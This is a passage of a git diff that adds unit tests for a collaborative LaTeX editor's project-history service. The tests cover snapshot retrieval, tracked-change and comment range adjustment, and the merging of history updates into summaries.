'c6654ea913979e13e22022653d284444f284a172', + }, + }, + }, + projectId: 'project-id-123', + }) + }) + }) + + describe('on blob store error', function () { + beforeEach(function () { + this.error = new Error('ESOCKETTIMEDOUT') + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: sinon.stub().rejects(this.error), + getObject: sinon.stub().resolves(), + }) + }) + + it('should call back with error', async function () { + await expect( + this.SnapshotManager.promises.getProjectSnapshot(this.projectId, 5) + ).to.be.rejectedWith(this.error.message) + }) + }) + }) + + describe('getLatestSnapshotFiles', function () { + describe('for a project', function () { + beforeEach(async function () {
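+ // Fixture chunk: a base snapshot at startVersion 3 plus two changes. textOperation entries are retain/insert pairs, e.g. [41, '\n\nSeven eight'] keeps 41 characters and appends the string, growing main.tex from 41 to 54 and then to 59 characters.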
this.HistoryStoreManager.promises.getMostRecentChunk.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + stringLength: 41, + }, + 'binary.png': { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [41, '\n\nSeven eight'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [54, ' nine'], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + authors: [ + { + id: 31, + email: 'james.allen@overleaf.com', + name: 'James', + }, + ], + }), + }) + + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon.stub().resolves( + `\ +Hello world + +One two three + +Four five six\ +`.replace(/^\t/g, '') + )), + getObject: sinon.stub().rejects(), + }) + this.data = await this.SnapshotManager.promises.getLatestSnapshotFiles( + this.projectId, + this.historyId + ) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getMostRecentChunk + .calledWith(this.projectId, this.historyId) + .should.equal(true) + }) + + it('should produce the snapshot file data', function () { + expect(this.data).to.have.all.keys(['main.tex', 'binary.png']) + expect(this.data['main.tex']).to.exist + expect(this.data['binary.png']).to.exist + expect(this.data['main.tex'].getStringLength()).to.equal(59) + expect(this.data['binary.png'].getByteLength()).to.equal(41) + expect(this.data['binary.png'].getHash()).to.equal( + 'c6654ea913979e13e22022653d284444f284a172' + ) + }) + }) + + describe('when the chunk is empty', function () { + it('should reject with an error', async function () { + this.HistoryStoreManager.promises.getMostRecentChunk.resolves(null) + await expect( + this.SnapshotManager.promises.getLatestSnapshotFiles( + this.projectId, + this.historyId + ) + ).to.be.rejectedWith('undefined chunk') + }) + }) + }) + + describe('getRangesSnapshot', function () { + beforeEach(async function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: (this.fileHash = + '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba'), + rangesHash: (this.rangesHash = + '73061952d41ce54825e2fc1c36b4cf736d5fb62f'), + stringLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 1, + authors: [ + { + id: 31, + email: 'author@example.com', + name: 'Author', + }, + ], + }), + }) + + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon.stub()), + getObject: (this.getObject = sinon.stub()), + }) + + this.getString.resolves('the quick brown fox jumps over the lazy dog') + }) + + describe('with tracked deletes', function () { + beforeEach(async function () { + this.getObject.resolves({ + trackedChanges: [ + { + // 'quick ' + range: { + pos: 4, + length: 6, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'fox ' + range: { + pos: 16, + length: 4, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'lazy ' + range: { + pos: 35, + length: 5, + }, + tracking: { + type: 'insert', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + //
'dog' + range: { + pos: 40, + length: 3, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + this.data = await this.SnapshotManager.promises.getRangesSnapshot( + this.projectId, + 1, + 'main.tex' + ) + }) + + it("doesn't shift the tracked delete by itself", function () { + expect(this.data.changes[0].op.p).to.eq(4) + }) + + it('should move subsequent tracked changes by the length of previous deletes', function () { + expect(this.data.changes[1].op.p).to.eq(16 - 6) + expect(this.data.changes[2].op.p).to.eq(35 - 6 - 4) + }) + + it("shouldn't move subsequent tracked changes by previous inserts", function () { + expect(this.data.changes[3].op.p).to.eq(40 - 6 - 4) + }) + }) + + describe('with comments and tracked deletes', function () { + beforeEach(async function () { + this.getObject.resolves({ + // the quick brown fox jumps over the lazy dog + trackedChanges: [ + { + // 'e qui' + range: { + pos: 2, + length: 5, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'r' + range: { + pos: 11, + length: 1, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'er the la' + range: { + pos: 28, + length: 9, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + comments: [ + { + id: 'comment-1', + ranges: [ + // 'quick' + { + pos: 4, + length: 5, + }, + // 'brown' + { + pos: 10, + length: 5, + }, + // 'over' + { + pos: 26, + length: 4, + }, + // 'lazy' + { + pos: 35, + length: 4, + }, + ], + resolved: false, + }, + { id: 'comment-2', ranges: [], resolved: true }, + { + id: 'comment-3', + ranges: [ + // 'q' + { pos: 4, length: 1 }, + ], + resolved: true, + }, + ], + }) + this.data = await this.SnapshotManager.promises.getRangesSnapshot( + this.projectId, + 1, + 'main.tex' + ) + }) + + it('should move the comment to the start of the tracked delete and remove overlapping text', function () { + expect(this.data.comments[0].op.p).to.eq(2) + expect(this.data.comments[0].op.c).to.eq('ck bown fox jumps ovzy') + }) + + it('should put resolved status in op', function () { + expect(this.data.comments[0].op.resolved).to.be.false + expect(this.data.comments[1].op.resolved).to.be.true + expect(this.data.comments[2].op.resolved).to.be.true + }) + + it('should include thread id', function () { + expect(this.data.comments[0].op.t).to.eq('comment-1') + expect(this.data.comments[1].op.t).to.eq('comment-2') + expect(this.data.comments[2].op.t).to.eq('comment-3') + }) + + it('should translate detached comment to zero length op', function () { + expect(this.data.comments[1].op.p).to.eq(0) + expect(this.data.comments[1].op.c).to.eq('') + }) + + it('should position a comment entirely in a tracked delete next to the tracked delete', function () { + expect(this.data.comments[2].op.p).to.eq(2) + expect(this.data.comments[2].op.c).to.eq('') + }) + }) + + describe('with multiple tracked changes and comments', function () { + beforeEach(async function () { + this.getObject.resolves({ + trackedChanges: [ + { + // 'quick ' + range: { + pos: 4, + length: 6, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'brown ' + range: { + pos: 10, + length: 6, + }, + tracking: { + type: 'insert', + userId: '31', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + // 'lazy ' + range: { + pos: 35, + length: 5, + }, + tracking: { + type: 'delete', + userId: '31', + ts: 
'2024-01-01T00:00:00.000Z', + }, + }, + ], + comments: [ + { + id: 'comment-1', + // 'quick', 'brown', 'lazy' + ranges: [ + { + pos: 4, + length: 5, + }, + { + pos: 10, + length: 5, + }, + { + pos: 35, + length: 4, + }, + ], + resolved: false, + }, + { + id: 'comment-2', + // 'the', 'the' + ranges: [ + { + pos: 0, + length: 3, + }, + { + pos: 31, + length: 3, + }, + ], + resolved: true, + }, + ], + }) + + this.data = await this.SnapshotManager.promises.getRangesSnapshot( + this.projectId, + 1, + 'main.tex' + ) + }) + + it('looks up ranges', function () { + expect(this.getObject).to.have.been.calledWith(this.rangesHash) + expect(this.getString).to.have.been.calledWith(this.fileHash) + }) + + it('should get the chunk', function () { + expect( + this.HistoryStoreManager.promises.getChunkAtVersion + ).to.have.been.calledWith(this.projectId, this.historyId, 1) + }) + + it('returns the ranges with content and adjusted positions to ignore tracked deletes', function () { + expect(this.data).to.deep.equal({ + changes: [ + { + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: '31', + }, + op: { + d: 'quick ', + p: 4, + }, + }, + { + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: '31', + }, + op: { + i: 'brown ', + p: 4, + }, + }, + { + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: '31', + }, + op: { + d: 'lazy ', + p: 29, + }, + }, + ], + comments: [ + { + op: { + c: 'brown fox jumps over the ', + p: 4, + t: 'comment-1', + resolved: false, + }, + id: 'comment-1', + }, + { + op: { + c: 'the brown fox jumps over the', + p: 0, + t: 'comment-2', + resolved: true, + }, + id: 'comment-2', + }, + ], + }) + }) + }) + + describe('with an empty file', function () { + beforeEach(async function () { + this.getString.resolves('') + this.getObject.resolves({}) + this.data = await this.SnapshotManager.promises.getRangesSnapshot( + this.projectId, + 1, + 'main.tex' + ) + }) + + it('should return empty comments and changes', function () { + expect(this.data).to.deep.equal({ + changes: [], + comments: [], + }) + }) + }) + }) + + describe('getFileMetadataSnapshot', function () { + beforeEach(function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba', + metadata: { + importer_id: 'test-user-id', + imported_at: '2024-01-01T00:00:00.000Z', + }, + stringLength: 41, + }, + 'other.tex': { + hash: '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba', + stringLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 1, + authors: [ + { + id: 31, + email: 'author@example.com', + name: 'Author', + }, + ], + }), + }) + }) + + it('should return the metadata for the file', async function () { + const result = + await this.SnapshotManager.promises.getFileMetadataSnapshot( + this.projectId, + 1, + 'main.tex' + ) + expect(result).to.deep.equal({ + metadata: { + importer_id: 'test-user-id', + imported_at: '2024-01-01T00:00:00.000Z', + }, + }) + }) + + it('should return undefined when file does not have metadata', async function () { + const result = + await this.SnapshotManager.promises.getFileMetadataSnapshot( + this.projectId, + 1, + 'other.tex' + ) + expect(result).to.deep.equal({ metadata: undefined }) + }) + + it('throw an error when file does not exist', async function () { + await expect( + this.SnapshotManager.promises.getFileMetadataSnapshot( + this.projectId, + 1, + 'does-not-exist.tex' + 
) + ).to.be.rejectedWith(Error) + }) + }) + + describe('getPathsAtVersion', function () { + beforeEach(function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: (this.fileHash = + '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba'), + rangesHash: (this.rangesHash = + '73061952d41ce54825e2fc1c36b4cf736d5fb62f'), + stringLength: 41, + }, + 'other.tex': { + hash: (this.fileHash = + 'f572d396fae9206628714fb2ce00f72e94f2258f'), + stringLength: 6, + }, + }, + }, + changes: [], + }, + startVersion: 4, + authors: [ + { + id: 31, + email: 'author@example.com', + name: 'Author', + }, + ], + }), + }) + }) + + it('should return an array of paths', async function () { + const result = await this.SnapshotManager.promises.getPathsAtVersion( + this.projectId, + 4 + ) + expect(result.paths).to.have.length(2) + expect(result.paths).to.include.members(['main.tex', 'other.tex']) + }) + }) +}) diff --git a/services/project-history/test/unit/js/SummarizedUpdatesManager/SummarizedUpdatesManagerTests.js b/services/project-history/test/unit/js/SummarizedUpdatesManager/SummarizedUpdatesManagerTests.js new file mode 100644 index 0000000..3cd0842 --- /dev/null +++ b/services/project-history/test/unit/js/SummarizedUpdatesManager/SummarizedUpdatesManagerTests.js @@ -0,0 +1,874 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/SummarizedUpdatesManager.js' + +// A sufficiently large amount of time to make the algorithm process updates +// separately +const LATER = 1000000 + +describe('SummarizedUpdatesManager', function () { + beforeEach(async function () { + this.historyId = 'history-id-123' + this.projectId = 'project-id-123' + this.firstChunk = { chunk: { startVersion: 0 } } + this.secondChunk = { chunk: { startVersion: 1 } } + + this.ChunkTranslator = { + convertToSummarizedUpdates: sinon.stub(), + } + this.HistoryApiManager = { + shouldUseProjectHistory: sinon.stub().yields(null, true), + } + this.HistoryStoreManager = { + getMostRecentChunk: sinon.stub(), + getChunkAtVersion: sinon.stub(), + } + this.UpdatesProcessor = { + processUpdatesForProject: sinon.stub().withArgs(this.projectId).yields(), + } + this.WebApiManager = { + getHistoryId: sinon.stub().yields(null, this.historyId), + } + this.LabelsManager = { + getLabels: sinon.stub().yields(null, []), + } + this.SummarizedUpdatesManager = await esmock(MODULE_PATH, { + '../../../../app/js/ChunkTranslator.js': this.ChunkTranslator, + '../../../../app/js/HistoryApiManager.js': this.HistoryApiManager, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/LabelsManager.js': this.LabelsManager, + }) + this.callback = sinon.stub() + }) + + describe('getSummarizedProjectUpdates', function () { + describe('chunk management', function () { + describe('when there is a single empty chunk', function () { + setupChunks([[]]) + expectSummaries('returns an empty list of updates', {}, []) + }) + + describe('when there is a single non-empty chunk', function () { + setupChunks([[makeUpdate()]]) + expectSummaries('returns summarized updates', {}, [makeSummary()]) + }) + + describe('when there are multiple chunks', function () { + setupChunks([ + 
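+ // Two chunks with one update each; the second starts at LATER, far enough apart in time that the summarizer keeps the two summaries separate.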
[makeUpdate({ startTs: 0, v: 1 })], + [makeUpdate({ startTs: LATER, v: 2 })], + ]) + + describe('and requesting many summaries', function () { + expectSummaries('returns many update summaries', {}, [ + makeSummary({ startTs: LATER, fromV: 2 }), + makeSummary({ startTs: 0, fromV: 1 }), + ]) + }) + + describe('and requesting a single summary', function () { + expectSummaries('returns a single update summary', { min_count: 1 }, [ + makeSummary({ startTs: LATER, fromV: 2 }), + ]) + }) + }) + + describe('when there are too many chunks', function () { + // Set up 10 chunks + const chunks = [] + for (let v = 1; v <= 10; v++) { + chunks.push([ + makeUpdate({ + startTs: v * 100, // values: 100 - 1000 + v, // values: 1 - 10 + }), + ]) + } + setupChunks(chunks) + + // Verify that we stop summarizing after 5 chunks + expectSummaries('summarizes the 5 latest chunks', {}, [ + makeSummary({ startTs: 600, endTs: 1010, fromV: 6, toV: 11 }), + ]) + }) + + describe('when requesting updates before a specific version', function () { + // Chunk 1 contains 5 updates that were made close to each other and 5 + // other updates that were made later. + const chunk1 = [] + for (let v = 1; v <= 5; v++) { + chunk1.push( + makeUpdate({ + startTs: v * 100, // values: 100 - 500 + v, // values: 1 - 5 + }) + ) + } + for (let v = 6; v <= 10; v++) { + chunk1.push( + makeUpdate({ + startTs: LATER + v * 100, // values: 1000600 - 1001000 + v, // values: 6 - 10 + }) + ) + } + + // Chunk 2 contains 5 updates that were made close to the latest updates in + // chunk 1. + const chunk2 = [] + for (let v = 11; v <= 15; v++) { + chunk2.push( + makeUpdate({ + startTs: LATER + v * 100, // values: 1001100 - 1001500 + v, // values: 11 - 15 + }) + ) + } + setupChunks([chunk1, chunk2]) + + expectSummaries( + 'summarizes the updates in a single chunk if the chunk is sufficient', + { before: 14, min_count: 1 }, + [ + makeSummary({ + startTs: LATER + 1100, + endTs: LATER + 1310, + fromV: 11, + toV: 14, + }), + ] + ) + + expectSummaries( + 'summarizes the updates in many chunks otherwise', + { before: 14, min_count: 2 }, + [ + makeSummary({ + startTs: LATER + 600, + endTs: LATER + 1310, + fromV: 6, + toV: 14, + }), + makeSummary({ + startTs: 100, + endTs: 510, + fromV: 1, + toV: 6, + }), + ] + ) + }) + }) + + describe('update summarization', function () { + describe('updates that are close in time', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: ['user2'], + startTs: 20, + v: 5, + }), + ], + ]) + + expectSummaries('should merge the updates', {}, [ + makeSummary({ + users: ['user1', 'user2'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('updates that are far apart in time', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 100, + v: 4, + }), + makeUpdate({ + users: ['user2'], + startTs: LATER, + v: 5, + }), + ], + ]) + + expectSummaries('should not merge the updates', {}, [ + makeSummary({ + users: ['user2'], + startTs: LATER, + endTs: LATER + 10, + fromV: 5, + toV: 6, + }), + makeSummary({ + users: ['user1'], + startTs: 100, + endTs: 110, + fromV: 4, + toV: 5, + }), + ]) + }) + + describe('mergeable updates in different chunks', function () { + setupChunks([ + [ + makeUpdate({ + pathnames: ['main.tex'], + users: ['user1'], + startTs: 10, + v: 4, + }), + makeUpdate({ + pathnames: ['main.tex'], + users: ['user2'], + startTs: 30, + v: 5, + }), + ], + [ + makeUpdate({ + pathnames: ['chapter.tex'], + users: 
['user1'], + startTs: 40, + v: 6, + }), + makeUpdate({ + pathnames: ['chapter.tex'], + users: ['user1'], + startTs: 50, + v: 7, + }), + ], + ]) + + expectSummaries('should merge the updates', {}, [ + makeSummary({ + pathnames: ['main.tex', 'chapter.tex'], + users: ['user1', 'user2'], + startTs: 10, + endTs: 60, + fromV: 4, + toV: 8, + }), + ]) + }) + + describe('null user values after regular users', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: [null], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should include the null values', {}, [ + makeSummary({ + users: [null, 'user1'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('null user values before regular users', function () { + setupChunks([ + [ + makeUpdate({ + users: [null], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: ['user1'], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should include the null values', {}, [ + makeSummary({ + users: [null, 'user1'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('multiple null user values', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 10, + v: 4, + }), + makeUpdate({ + users: [null], + startTs: 20, + v: 5, + }), + makeUpdate({ + users: [null], + startTs: 70, + v: 6, + }), + ], + ]) + expectSummaries('should merge the null values', {}, [ + makeSummary({ + users: [null, 'user1'], + startTs: 10, + endTs: 80, + fromV: 4, + toV: 7, + }), + ]) + }) + + describe('multiple users', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: ['user2'], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should merge the users', {}, [ + makeSummary({ + users: ['user1', 'user2'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('duplicate updates with the same v1 user', function () { + setupChunks([ + [ + makeUpdate({ + users: [{ id: 'user1' }], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: [{ id: 'user1' }], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should deduplicate the users', {}, [ + makeSummary({ + users: [{ id: 'user1' }], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('duplicate updates with the same v2 user', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: ['user1'], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should deduplicate the users', {}, [ + makeSummary({ + users: ['user1'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('mixed v1 and v2 users with the same id', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: [{ id: 'user1' }], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should deduplicate the users', {}, [ + makeSummary({ + users: [{ id: 'user1' }], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('project ops in mergeable updates', function () { + setupChunks([ + [ + makeUpdate({ + pathnames: [], + projectOps: [ + { rename: { pathname: 'C.tex', newPathname: 'D.tex' } }, + ], + users: ['user2'], + startTs: 0, + v: 4, + }), + makeUpdate({ + pathnames: [], + projectOps: [ + { rename: { pathname: 'A.tex', newPathname: 'B.tex' } }, + ], + users: ['user1'], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should 
merge project ops', {}, [ + makeSummary({ + pathnames: [], + projectOps: [ + { + atV: 5, + rename: { + pathname: 'A.tex', + newPathname: 'B.tex', + }, + }, + { + atV: 4, + rename: { + pathname: 'C.tex', + newPathname: 'D.tex', + }, + }, + ], + users: ['user1', 'user2'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('mergeable updates with a mix of project ops and doc ops', function () { + setupChunks([ + [ + makeUpdate({ + pathnames: ['main.tex'], + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + pathnames: [], + users: ['user2'], + projectOps: [ + { rename: { pathname: 'A.tex', newPathname: 'B.tex' } }, + ], + startTs: 20, + v: 5, + }), + makeUpdate({ + pathnames: ['chapter.tex'], + users: ['user2'], + startTs: 40, + v: 6, + }), + ], + ]) + expectSummaries('should keep updates separate', {}, [ + makeSummary({ + pathnames: ['chapter.tex'], + users: ['user2'], + startTs: 40, + fromV: 6, + }), + makeSummary({ + pathnames: [], + users: ['user2'], + projectOps: [ + { atV: 5, rename: { pathname: 'A.tex', newPathname: 'B.tex' } }, + ], + startTs: 20, + fromV: 5, + }), + makeSummary({ + pathnames: ['main.tex'], + users: ['user1'], + startTs: 0, + fromV: 4, + }), + ]) + }) + + describe('label on an update', function () { + const label = { + id: 'mock-id', + comment: 'an example comment', + version: 5, + } + setupChunks([ + [ + makeUpdate({ startTs: 0, v: 3 }), + makeUpdate({ startTs: 20, v: 4 }), + makeUpdate({ startTs: 40, v: 5 }), + makeUpdate({ startTs: 60, v: 6 }), + ], + ]) + setupLabels([label]) + + expectSummaries('should split the updates at the label', {}, [ + makeSummary({ startTs: 40, endTs: 70, fromV: 5, toV: 7 }), + makeSummary({ + startTs: 0, + endTs: 30, + fromV: 3, + toV: 5, + labels: [label], + }), + ]) + }) + + describe('updates with origin', function () { + setupChunks([ + [ + makeUpdate({ startTs: 0, v: 1 }), + makeUpdate({ startTs: 10, v: 2 }), + makeUpdate({ + startTs: 20, + v: 3, + origin: { kind: 'history-resync' }, + }), + makeUpdate({ + startTs: 30, + v: 4, + origin: { kind: 'history-resync' }, + }), + makeUpdate({ startTs: 40, v: 5 }), + makeUpdate({ startTs: 50, v: 6 }), + ], + ]) + + expectSummaries( + 'should split the updates where the origin appears or disappears', + {}, + [ + makeSummary({ startTs: 40, endTs: 60, fromV: 5, toV: 7 }), + makeSummary({ + startTs: 20, + endTs: 40, + fromV: 3, + toV: 5, + origin: { kind: 'history-resync' }, + }), + makeSummary({ startTs: 0, endTs: 20, fromV: 1, toV: 3 }), + ] + ) + }) + + describe('updates with different origins', function () { + setupChunks([ + [ + makeUpdate({ startTs: 0, v: 1, origin: { kind: 'origin-a' } }), + makeUpdate({ startTs: 10, v: 2, origin: { kind: 'origin-a' } }), + makeUpdate({ startTs: 20, v: 3, origin: { kind: 'origin-b' } }), + makeUpdate({ startTs: 30, v: 4, origin: { kind: 'origin-b' } }), + ], + ]) + expectSummaries( + 'should split the updates when the origin kind changes', + {}, + [ + makeSummary({ + startTs: 20, + endTs: 40, + fromV: 3, + toV: 5, + origin: { kind: 'origin-b' }, + }), + makeSummary({ + startTs: 0, + endTs: 20, + fromV: 1, + toV: 3, + origin: { kind: 'origin-a' }, + }), + ] + ) + }) + + describe('empty updates', function () { + setupChunks([ + [ + makeUpdate({ startTs: 0, v: 1, pathnames: ['main.tex'] }), + makeUpdate({ startTs: 10, v: 2, pathnames: [] }), + makeUpdate({ startTs: 20, v: 3, pathnames: ['main.tex'] }), + makeUpdate({ startTs: 30, v: 4, pathnames: [] }), + makeUpdate({ startTs: 40, v: 5, pathnames: [] }), + ], + [
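+ // Second chunk: more empty (pathnames: []) updates, then two real edits at LATER; the summarizer is expected to skip the empty updates.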
makeUpdate({ startTs: 50, v: 6, pathnames: [] }), + makeUpdate({ startTs: LATER, v: 7, pathnames: [] }), + makeUpdate({ startTs: LATER + 10, v: 8, pathnames: ['main.tex'] }), + makeUpdate({ startTs: LATER + 20, v: 9, pathnames: ['main.tex'] }), + makeUpdate({ startTs: LATER + 30, v: 10, pathnames: [] }), + ], + ]) + + expectSummaries('should skip empty updates', {}, [ + makeSummary({ + startTs: LATER + 10, + endTs: LATER + 30, + fromV: 8, + toV: 11, + }), + makeSummary({ startTs: 0, endTs: 30, fromV: 1, toV: 8 }), + ]) + }) + + describe('history resync updates', function () { + setupChunks([ + [ + makeUpdate({ + startTs: 0, + v: 1, + origin: { kind: 'history-resync' }, + projectOps: [{ add: { pathname: 'file1.tex' } }], + pathnames: [], + }), + makeUpdate({ + startTs: 20, + v: 2, + origin: { kind: 'history-resync' }, + projectOps: [ + { add: { pathname: 'file2.tex' } }, + { add: { pathname: 'file3.tex' } }, + ], + pathnames: [], + }), + makeUpdate({ + startTs: 40, + v: 3, + origin: { kind: 'history-resync' }, + projectOps: [{ add: { pathname: 'file4.tex' } }], + pathnames: [], + }), + makeUpdate({ + startTs: 60, + v: 4, + origin: { kind: 'history-resync' }, + projectOps: [], + pathnames: ['file1.tex', 'file2.tex', 'file5.tex'], + }), + makeUpdate({ + startTs: 80, + v: 5, + origin: { kind: 'history-resync' }, + projectOps: [], + pathnames: ['file4.tex'], + }), + makeUpdate({ startTs: 100, v: 6, pathnames: ['file1.tex'] }), + ], + ]) + expectSummaries('should merge creates and edits', {}, [ + makeSummary({ + startTs: 100, + endTs: 110, + fromV: 6, + toV: 7, + pathnames: ['file1.tex'], + }), + makeSummary({ + startTs: 0, + endTs: 90, + fromV: 1, + toV: 6, + origin: { kind: 'history-resync' }, + pathnames: ['file5.tex'], + projectOps: [ + { add: { pathname: 'file4.tex' }, atV: 3 }, + { add: { pathname: 'file2.tex' }, atV: 2 }, + { add: { pathname: 'file3.tex' }, atV: 2 }, + { add: { pathname: 'file1.tex' }, atV: 1 }, + ], + }), + ]) + }) + }) + }) +}) + +/** + * Set up mocks as if the project had a number of chunks. + * + * Each parameter represents a chunk and the value of the parameter is the list + * of updates in that chunk. 
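+ * (Concretely, the function takes a single array argument, updatesByChunk; each element is one chunk's list of updates.)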
+ */ +function setupChunks(updatesByChunk) { + beforeEach('set up chunks', function () { + let startVersion = 0 + for (let i = 0; i < updatesByChunk.length; i++) { + const updates = updatesByChunk[i] + const chunk = { chunk: { startVersion } } + + // Find the chunk by any update version + for (const update of updates) { + this.HistoryStoreManager.getChunkAtVersion + .withArgs(this.projectId, this.historyId, update.v) + .yields(null, chunk) + startVersion = update.v + } + + if (i === updatesByChunk.length - 1) { + this.HistoryStoreManager.getMostRecentChunk + .withArgs(this.projectId, this.historyId) + .yields(null, chunk) + } + + this.ChunkTranslator.convertToSummarizedUpdates + .withArgs(chunk) + .yields(null, updates) + } + }) +} + +function setupLabels(labels) { + beforeEach('set up labels', function () { + this.LabelsManager.getLabels.withArgs(this.projectId).yields(null, labels) + }) +} + +function expectSummaries(description, options, expectedSummaries) { + it(`${description}`, function (done) { + this.SummarizedUpdatesManager.getSummarizedProjectUpdates( + this.projectId, + options, + (err, summaries) => { + if (err) { + return done(err) + } + + // The order of the users array is not significant + for (const summary of summaries) { + summary.meta.users.sort() + } + for (const summary of expectedSummaries) { + summary.meta.users.sort() + } + + expect(summaries).to.deep.equal(expectedSummaries) + done() + } + ) + }) +} + +function makeUpdate(options = {}) { + const { + pathnames = ['main.tex'], + users = ['user1'], + projectOps = [], + startTs = 0, + endTs = startTs + 10, + v = 1, + origin, + } = options + const update = { + pathnames, + project_ops: projectOps, + meta: { users, start_ts: startTs, end_ts: endTs }, + v, + } + if (origin) { + update.meta.origin = origin + } + return update +} + +function makeSummary(options = {}) { + const { + pathnames = ['main.tex'], + users = ['user1'], + startTs = 0, + endTs = startTs + 10, + fromV = 1, + toV = fromV + 1, + labels = [], + projectOps = [], + origin, + } = options + const summary = { + pathnames: new Set(pathnames), + meta: { + users, + start_ts: startTs, + end_ts: endTs, + }, + fromV, + toV, + labels, + project_ops: projectOps, + } + if (origin) { + summary.meta.origin = origin + } + return summary +} diff --git a/services/project-history/test/unit/js/SyncManager/SyncManagerTests.js b/services/project-history/test/unit/js/SyncManager/SyncManagerTests.js new file mode 100644 index 0000000..1004ffd --- /dev/null +++ b/services/project-history/test/unit/js/SyncManager/SyncManagerTests.js @@ -0,0 +1,2008 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import mongodb from 'mongodb-legacy' +import tk from 'timekeeper' +import { File, Comment, TrackedChange, Range } from 'overleaf-editor-core' +import { strict as esmock } from 'esmock' +const { ObjectId } = mongodb + +const MODULE_PATH = '../../../../app/js/SyncManager.js' +const TIMESTAMP = new Date().toISOString() +const USER_ID = 'user-id' + +function resyncProjectStructureUpdate(docs, files) { + return { + resyncProjectStructure: { docs, files }, + + meta: { + ts: TIMESTAMP, + }, + } +} + +function docContentSyncUpdate( + doc, + content, + ranges = {}, + resolvedCommentIds = [] +) { + return { + path: doc.path, + doc: doc.doc, + + resyncDocContent: { + content, + ranges, + resolvedCommentIds, + }, + + 